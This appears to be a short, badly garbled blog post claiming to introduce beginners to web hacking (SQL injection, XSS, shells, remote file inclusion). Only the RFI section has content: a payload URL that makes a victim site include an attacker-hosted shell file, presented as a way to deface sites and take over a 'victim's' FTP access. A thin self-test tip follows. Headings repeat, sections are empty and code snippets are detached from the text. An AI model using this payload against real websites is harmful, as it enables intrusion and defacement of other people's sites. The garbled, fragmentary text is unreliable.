Hello friend,
I have recieved many emails from beginers asking for web hacking
intoduction..we will discuss some most commonly used web hacking techniques which helps hackers to hack any website. This will help you to SAVE YOUR SITE!
1. SQL Injection ( if u need the Sql Complete tutorial )
2. XSS
3. Shells
4. RFI
5. There are some more but they are TOOO big to be discussed in here.
1. SQL Injection:
2. XSS:3. Shells:4. RFI:
1. SQL Injection ( if u need the Sql Complete tutorial )
2. XSS
3. Shells
4. RFI
5. There are some more but they are TOOO big to be discussed in here.
1. SQL Injection:
2. XSS:3. Shells:4. RFI:
RFI is a good way to deface a website. It is used with shell. Suppose you have uploaded your shell on:
and you found a vulnerable site to RFI... then you can do as follow:
This will again give u the access of your victim's sites FTP , just as shell so you can f*ck up anything you want.
P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .
If your site's URL is:
just add something liek this at the end
And if it incldes the google page into your page, that means its vulnerable to RFI
Thanks
Code:
yoursite.com/shell.txtCode:
victimssite.com/index.php?page=yousite.com/shell.txtP.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .
If your site's URL is:
Code:
yoursite.com/index.php?id=545Code:
yoursite.com/index.php?id=http://www.google.comThanks
No comments:
Post a Comment